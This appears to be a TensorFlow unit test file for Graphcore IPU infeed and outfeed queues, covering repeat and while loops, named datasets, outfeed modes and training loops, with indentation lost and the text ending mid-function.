from tensorflow.python import ipu
from tensorflow.python.client import session as session_lib
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import readers
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.keras import layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import gradient_descent
class InfeedOutfeedTest(test_util.TensorFlowTestCase):
@test_util.deprecated_graph_mode_only
def testSingleInfeedRepeatNonTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, x):
v = v + x
return v
def my_net(v):
r = ipu.loops.repeat(20, body, (v), infeed_queue)
return r
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res, {v: np.ones([4, 4], np.float32)})
self.assertAllClose(result[0], np.broadcast_to(91, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedRepeatNonTupleFiniteDataset(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10,
shape=[4, 4],
repeat=False)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, x):
v = v + x
return v
def my_net(v):
r = ipu.loops.repeat(10, body, (v), infeed_queue)
return r
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res, {v: np.ones([4, 4], np.float32)})
self.assertAllClose(result[0], np.broadcast_to(46, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedRepeatTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, im1, im2):
v = v + im1 + im2
return v
def my_net():
v = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(31, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedRepeatTupleMerge(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.optimizations.merge_infeed_io_copies = True
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, im1, im2):
v = v + im1 + im2
return v
def my_net():
v = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(31, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedRepeatNamed(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return {"a": image_1, "b": image_2}
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
# Note how the parameters are swapped around: values from a named (dict)
# dataset are matched to the body arguments by name, so their order in the
# signature does not matter.
def body(v1, v2, b, a):
v1 = v1 + a
v2 = v2 + b
return (v1, v2)
def my_net():
v1 = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
v2 = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
r = ipu.loops.repeat(5, body, [v1, v2], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(4, [4, 4]))
self.assertAllClose(result[1], np.broadcast_to(27, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedMultipleRepeats(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(2, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, x):
v = v + x
return v
def my_net():
v = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
r = ipu.loops.repeat(5, body, [r], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(5, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedWhileLoopNonTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def cond(i, v):
return i < 20
def body(i, v, x):
v = v + x
return (i + 1, v)
def my_net(v):
i = 0
r = ipu.loops.while_loop(cond, body, (i, v), infeed_queue)
return r[1]
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res, {v: np.ones([4, 4], np.float32)})
self.assertAllClose(result[0], np.broadcast_to(91, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedWhileLoopTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def cond(i, v):
return i < 20
def body(i, v, im1, im2):
v = v + im1 + im2
return (i + 1, v)
def my_net(v):
i = 0
r = ipu.loops.while_loop(cond, body, (i, v), infeed_queue)
return r[1]
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res, {v: np.ones([4, 4], np.float32)})
self.assertAllClose(result[0], np.broadcast_to(129.5, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedMultipleRuns(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def program(iters):
def body(v, x):
v = v + x
return v
def my_net():
v = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
r = ipu.loops.repeat(iters, body, (v), infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
return ipu.ipu_compiler.compile(my_net)
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(program(0))
self.assertAllClose(result[0], np.broadcast_to(0, [4, 4]))
# The iterator has not moved - next element should be all 1s.
result = sess.run(program(2))
self.assertAllClose(result[0], np.broadcast_to(1, [4, 4]))
# The iterator has moved - in the next two iterations it should pull 2 and 3.
result = sess.run(program(2))
self.assertAllClose(result[0], np.broadcast_to(5, [4, 4]))
# The iterator has moved - in the next two iterations it should pull 4 and 5.
result = sess.run(program(2))
self.assertAllClose(result[0], np.broadcast_to(9, [4, 4]))
@test_util.deprecated_graph_mode_only
def testTwoInfeedsDifferentPrograms(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset1 = tu.create_single_increasing_dataset(20, shape=[4, 4])
dataset2 = tu.create_single_increasing_dataset(3, shape=[4, 4])
infeed_queue1 = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset1)
infeed_queue2 = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset2)
def program(iters, infeed_queue):
def body(v, x):
v = v + x
return v
def my_net():
v = constant_op.constant(0.0, shape=[4, 4], dtype=np.float32)
r = ipu.loops.repeat(iters, body, (v), infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
return ipu.ipu_compiler.compile(my_net)
with session_lib.Session() as sess:
sess.run(infeed_queue1.initializer)
sess.run(infeed_queue2.initializer)
result = sess.run(program(5, infeed_queue1))
self.assertAllClose(result[0], np.broadcast_to(10, [4, 4]))
result = sess.run(program(5, infeed_queue2))
self.assertAllClose(result[0], np.broadcast_to(4, [4, 4]))
result = sess.run(program(5, infeed_queue1))
self.assertAllClose(result[0], np.broadcast_to(35, [4, 4]))
result = sess.run(program(5, infeed_queue2))
self.assertAllClose(result[0], np.broadcast_to(5, [4, 4]))
@test_util.deprecated_graph_mode_only
def testUndefinedShape(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
dataset = dataset.batch(10, drop_remainder=False)
with self.assertRaisesRegex(ValueError, r'Output shape \((\?|None),'):
ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
@test_util.deprecated_graph_mode_only
def testMultipleInitializations(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
_ = infeed_queue.initializer
with self.assertRaisesRegex(
ValueError,
'The IPUInfeedQueue `initializer` function can only be accessed once.'
):
_ = infeed_queue.initializer
def _testDatasetExceptionTerminates(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
# Normally we would use the deprecated_graph_mode_only decorator but this
# function is being called inside a subprocess independently.
with context.graph_mode():
BAD_PATH = 'this/path/doesnt/exist/'
dataset = readers.FixedLengthRecordDataset([BAD_PATH], 100)
dataset = dataset.map(
lambda f: parsing_ops.decode_raw(f, dtypes.float32)[0])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
with ipu.scopes.ipu_scope("/device:IPU:0"):
r = ipu.ipu_compiler.compile(infeed_queue._dequeue, []) # pylint: disable=protected-access
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(r)
def testDatasetExceptionTerminates(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
TIMEOUT = 10
cmd = [
sys.executable, __file__, "{}.{}".format(
InfeedOutfeedTest.__name__,
InfeedOutfeedTest._testDatasetExceptionTerminates.__name__)
]
result = subprocess.run(cmd, stderr=subprocess.PIPE, timeout=TIMEOUT)
self.assertEqual(result.returncode, -signal.SIGABRT)
error = result.stderr.decode()
self.assertIn("An infeed dataset iterator has failed", error)
@test_util.deprecated_graph_mode_only
def testTrainingLoopWithInfeed(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4, 2])
dataset = dataset.batch(batch_size=2, drop_remainder=True)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def my_net(iters):
def body(loss, x):
with variable_scope.variable_scope("vs", use_resource=True):
y = layers.Conv2D(2,
1,
use_bias=True,
kernel_initializer=init_ops.ones_initializer(),
name='conv1')(x)
loss = math_ops.reduce_sum(y)
optimizer = gradient_descent.GradientDescentOptimizer(0.1)
train = optimizer.minimize(loss)
with ops.control_dependencies([train]):
return array_ops.identity(loss)
loss = 0.0
return ipu.loops.repeat(iters, body, (loss), infeed_queue)
with ops.device('cpu'):
iters = array_ops.placeholder(np.int32, shape=[])
with ipu.scopes.ipu_scope("/device:IPU:0"):
r = ipu.ipu_compiler.compile(my_net, inputs=[iters])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(variables.global_variables_initializer())
initial_loss = sess.run(r, {iters: 1})
final_loss = sess.run(r, {iters: 1000})
self.assertTrue(initial_loss > final_loss)
@test_util.deprecated_graph_mode_only
def testMultipleOutfeedEnqueue(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(v):
outfeed = outfeed_queue.enqueue(v)
outfeed = outfeed_queue.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net(v):
r = ipu.loops.repeat(20, body, (v))
return r
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
with self.assertRaises(ValueError):
ipu.ipu_compiler.compile(my_net, inputs=[v])
@test_util.deprecated_graph_mode_only
def testMultipleOutfeedEnqueueDifferentGraphs(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(v):
outfeed = outfeed_queue.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net(v):
r = ipu.loops.repeat(20, body, (v))
return r
with ops.Graph().as_default():
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
self.assertFalse(outfeed_queue.enqueued)
with ipu.scopes.ipu_scope("/device:IPU:0"):
ipu.ipu_compiler.compile(my_net, inputs=[v])
self.assertTrue(outfeed_queue.enqueued)
with ops.Graph().as_default():
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
# Not enqueued in the current graph.
self.assertFalse(outfeed_queue.enqueued)
with ipu.scopes.ipu_scope("/device:IPU:0"):
ipu.ipu_compiler.compile(my_net, inputs=[v])
self.assertTrue(outfeed_queue.enqueued)
@test_util.deprecated_graph_mode_only
def testSingleOutfeedRepeatNonTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(v):
outfeed = outfeed_queue.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net(v):
r = ipu.loops.repeat(20, body, (v))
return r
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
outfeed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
result = sess.run(res, {v: np.ones([4, 4], np.float32)})
self.assertAllClose(result[0], np.broadcast_to(21, [4, 4]))
outfed = sess.run(outfeed)
for i in range(20):
self.assertAllClose(outfed[i], np.broadcast_to(i + 1, [4, 4]))
@test_util.deprecated_graph_mode_only
def testMultipleOutfeedsInSameGraph(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue1 = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
outfeed_queue2 = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def inner_body(v):
outfeed = outfeed_queue2.enqueue(v)
v = v + 1
return v, outfeed
def body(v):
outfeed = outfeed_queue1.enqueue(v)
v = ipu.loops.repeat(10, inner_body, v)
return v, outfeed
def my_net(v):
r = ipu.loops.repeat(10, body, v)
return r
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
dequeued1 = outfeed_queue1.dequeue()
dequeued2 = outfeed_queue2.dequeue()
with session_lib.Session() as sess:
sess.run(res, {v: 0.0})
out1, out2 = sess.run([dequeued1, dequeued2])
self.assertAllEqual(np.arange(0, 100, step=10), out1)
self.assertAllEqual(np.arange(0, 100, step=1), out2)
@test_util.deprecated_graph_mode_only
def testSingleInfeedOutfeedRepeatNonTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(v, x):
v = v + x
outfeed = outfeed_queue.enqueue(v)
return (v, outfeed)
def my_net(v):
r = ipu.loops.repeat(20, body, (v), infeed_queue)
return r
with ops.device('cpu'):
v = array_ops.placeholder(np.float32, [4, 4])
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[v])
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res, {v: np.ones([4, 4], np.float32)})
self.assertAllClose(result[0], np.broadcast_to(91, [4, 4]))
outfed = sess.run(outfeed_queue.dequeue())
self.assertEqual(outfed.shape, (20, 4, 4))
self.assertAllClose(outfed[-1], result[0])
self.assertAllClose(outfed[5], np.broadcast_to(16, [4, 4]))
@test_util.deprecated_graph_mode_only
def testSingleInfeedOutfeedRepeatTuple(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
shape = [4, 4]
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(v, im1, im2):
v = v + im1 + im2
outfeed = outfeed_queue.enqueue((v, im1, im2))
return (v, outfeed)
def my_net():
v = constant_op.constant(0.0, shape=shape, dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
outfed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(31, shape))
outfed_result = sess.run(outfed)
self.assertTrue(len(outfed_result) == 3)
self.assertAllClose(outfed_result[0][0], np.broadcast_to(5, shape))
self.assertAllClose(outfed_result[0][1], np.broadcast_to(11.5, shape))
self.assertAllClose(outfed_result[0][2], np.broadcast_to(19.5, shape))
self.assertAllClose(outfed_result[0][3], np.broadcast_to(24.5, shape))
self.assertAllClose(outfed_result[0][4], np.broadcast_to(31, shape))
self.assertAllClose(outfed_result[1][0], np.broadcast_to(0, shape))
self.assertAllClose(outfed_result[1][1], np.broadcast_to(1, shape))
self.assertAllClose(outfed_result[1][2], np.broadcast_to(2, shape))
self.assertAllClose(outfed_result[1][3], np.broadcast_to(0, shape))
self.assertAllClose(outfed_result[1][4], np.broadcast_to(1, shape))
self.assertAllClose(outfed_result[2][0], np.broadcast_to(5, shape))
self.assertAllClose(outfed_result[2][1], np.broadcast_to(5.5, shape))
self.assertAllClose(outfed_result[2][2], np.broadcast_to(6, shape))
self.assertAllClose(outfed_result[2][3], np.broadcast_to(5, shape))
self.assertAllClose(outfed_result[2][4], np.broadcast_to(5.5, shape))
@test_util.deprecated_graph_mode_only
def testSingleInfeedOutfeedRepeatTupleLast(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
shape = [4, 4]
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue(
outfeed_mode=ipu.ipu_outfeed_queue.IPUOutfeedMode.LAST)
def body(v, im1, im2):
v = v + im1 + im2
outfeed = outfeed_queue.enqueue((v, im1, im2))
return (v, outfeed)
def my_net():
v = constant_op.constant(0.0, shape=shape, dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
outfed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(31, shape))
outfed_result = sess.run(outfed)
self.assertTrue(len(outfed_result) == 3)
self.assertAllClose(outfed_result[0], np.broadcast_to(31, shape))
self.assertAllClose(outfed_result[1], np.broadcast_to(1, shape))
self.assertAllClose(outfed_result[2], np.broadcast_to(5.5, shape))
@test_util.deprecated_graph_mode_only
def testSingleInfeedOutfeedRepeatNamed(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
shape = [4, 4]
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(v, im1, im2):
v = v + im1 + im2
outfeed = outfeed_queue.enqueue({"v": v, "image1": im1, "image2": im2})
return (v, outfeed)
def my_net():
v = constant_op.constant(0.0, shape=shape, dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
outfed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(31, shape))
outfed_result = sess.run(outfed)
self.assertTrue(len(outfed_result) == 3)
self.assertAllClose(outfed_result["v"][0], np.broadcast_to(5, shape))
self.assertAllClose(outfed_result["v"][1], np.broadcast_to(11.5, shape))
self.assertAllClose(outfed_result["v"][2], np.broadcast_to(19.5, shape))
self.assertAllClose(outfed_result["v"][3], np.broadcast_to(24.5, shape))
self.assertAllClose(outfed_result["v"][4], np.broadcast_to(31, shape))
self.assertAllClose(outfed_result["image1"][0],
np.broadcast_to(0, shape))
self.assertAllClose(outfed_result["image1"][1],
np.broadcast_to(1, shape))
self.assertAllClose(outfed_result["image1"][2],
np.broadcast_to(2, shape))
self.assertAllClose(outfed_result["image1"][3],
np.broadcast_to(0, shape))
self.assertAllClose(outfed_result["image1"][4],
np.broadcast_to(1, shape))
self.assertAllClose(outfed_result["image2"][0],
np.broadcast_to(5, shape))
self.assertAllClose(outfed_result["image2"][1],
np.broadcast_to(5.5, shape))
self.assertAllClose(outfed_result["image2"][2],
np.broadcast_to(6, shape))
self.assertAllClose(outfed_result["image2"][3],
np.broadcast_to(5, shape))
self.assertAllClose(outfed_result["image2"][4],
np.broadcast_to(5.5, shape))
@test_util.deprecated_graph_mode_only
def testSingleInfeedOutfeedRepeatNamedLast(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(3, shape=[4, 4])
shape = [4, 4]
def dataset_parser(value):
image_1 = value
image_2 = (value + 10.) / 2.0
return (image_1, image_2)
dataset = dataset.map(dataset_parser)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue(
outfeed_mode=ipu.ipu_outfeed_queue.IPUOutfeedMode.LAST)
def body(v, im1, im2):
v = v + im1 + im2
outfeed = outfeed_queue.enqueue({"v": v, "image1": im1, "image2": im2})
return (v, outfeed)
def my_net():
v = constant_op.constant(0.0, shape=shape, dtype=np.float32)
r = ipu.loops.repeat(5, body, [v], infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
outfed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
result = sess.run(res)
self.assertAllClose(result[0], np.broadcast_to(31, shape))
outfed_result = sess.run(outfed)
self.assertTrue(len(outfed_result) == 3)
self.assertAllClose(outfed_result["v"], np.broadcast_to(31, shape))
self.assertAllClose(outfed_result["image1"], np.broadcast_to(1, shape))
self.assertAllClose(outfed_result["image2"], np.broadcast_to(5.5, shape))
@test_util.deprecated_graph_mode_only
def testTrainingLoopWithInfeedAndOutfeedGetAll(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4, 2])
dataset = dataset.batch(batch_size=2, drop_remainder=True)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def my_net(iters):
def body(loss, x):
with variable_scope.variable_scope("vs", use_resource=True):
y = layers.Conv2D(2,
1,
use_bias=True,
kernel_initializer=init_ops.ones_initializer(),
name='conv1')(x)
loss = math_ops.reduce_sum(y)
optimizer = gradient_descent.GradientDescentOptimizer(0.1)
train = optimizer.minimize(loss)
outfeed = outfeed_queue.enqueue(loss)
with ops.control_dependencies([train]):
return (array_ops.identity(loss), outfeed)
loss = 0.0
return ipu.loops.repeat(iters, body, (loss), infeed_queue)
with ops.device('cpu'):
iters = array_ops.placeholder(np.int32, shape=[])
with ipu.scopes.ipu_scope("/device:IPU:0"):
r = ipu.ipu_compiler.compile(my_net, inputs=[iters])
outfeeds = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(variables.global_variables_initializer())
initial_loss = sess.run(r, {iters: 1})
final_loss = sess.run(r, {iters: 1000})
outfed = sess.run(outfeeds)
self.assertTrue(initial_loss > final_loss)
self.assertEqual(outfed.shape[0], 1001)
self.assertTrue(isinstance(outfed, np.ndarray))
@test_util.deprecated_graph_mode_only
def testTrainingLoopWithInfeedAndOutfeedGetLast(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4, 2])
dataset = dataset.batch(batch_size=2, drop_remainder=True)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue(
outfeed_mode=ipu.ipu_outfeed_queue.IPUOutfeedMode.LAST)
def my_net(iters):
def body(loss, x):
with variable_scope.variable_scope("vs", use_resource=True):
y = layers.Conv2D(2,
1,
use_bias=True,
kernel_initializer=init_ops.ones_initializer(),
name='conv1')(x)
loss = math_ops.reduce_sum(y)
optimizer = gradient_descent.GradientDescentOptimizer(0.1)
train = optimizer.minimize(loss)
outfeed = outfeed_queue.enqueue(loss)
with ops.control_dependencies([train]):
return (array_ops.identity(loss), outfeed)
loss = 0.0
return ipu.loops.repeat(iters, body, (loss), infeed_queue)
with ops.device('cpu'):
iters = array_ops.placeholder(np.int32, shape=[])
with ipu.scopes.ipu_scope("/device:IPU:0"):
r = ipu.ipu_compiler.compile(my_net, inputs=[iters])
outfeeds = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(variables.global_variables_initializer())
initial_loss = sess.run(r, {iters: 1})
final_loss = sess.run(r, {iters: 1000})
outfed = sess.run(outfeeds)
self.assertTrue(initial_loss > final_loss)
self.assertTrue(outfed == final_loss)
# Check that a scalar is returned instead of a numpy array
self.assertTrue(isinstance(outfed, np.float32))
@test_util.deprecated_graph_mode_only
def testTwoOutfeedsDifferentPrograms(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
outfeed_queue1 = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
outfeed_queue2 = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body1(v):
outfeed = outfeed_queue1.enqueue(v)
v = v + 1
return (v, outfeed)
def my_net1(v):
